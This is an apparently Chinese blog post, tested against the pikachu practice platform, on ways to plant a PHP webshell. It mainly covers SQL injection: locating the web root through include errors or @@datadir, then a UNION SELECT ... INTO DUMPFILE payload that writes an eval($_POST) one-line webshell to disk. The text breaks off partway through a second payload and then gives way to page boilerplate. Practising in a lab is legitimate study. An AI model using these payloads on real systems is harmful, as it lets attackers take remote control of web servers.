写入webshell的几种方式

测试:pikachu平台
研究了几种写入webshell的方式
一、上传漏洞写入
包含前端限制绕过、图片马绕过等一些绕过方法详细见https://www.cnblogs.com/dogecheng/p/11640389.html
二、sql注入写入
前提是有root权限
sql注入写入一句话木马
可以根据本地包含报错查找路径
C:\xampp\htdocs\pikachu\vul\fileinclude
也可以根据

union select 1,@@datadir查找mysql data路径

C:\xampp\mysql\data(但是没有开web访问权限也没有用的)
两种方法都可

union select 1,"<?php eval($_POST[666]);?>" into dumpfile "C:\\xampp\\htdocs\\pikachu\\vul\\fileinclude\\qimingfuckyou.php"
union select 1,"<?p
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值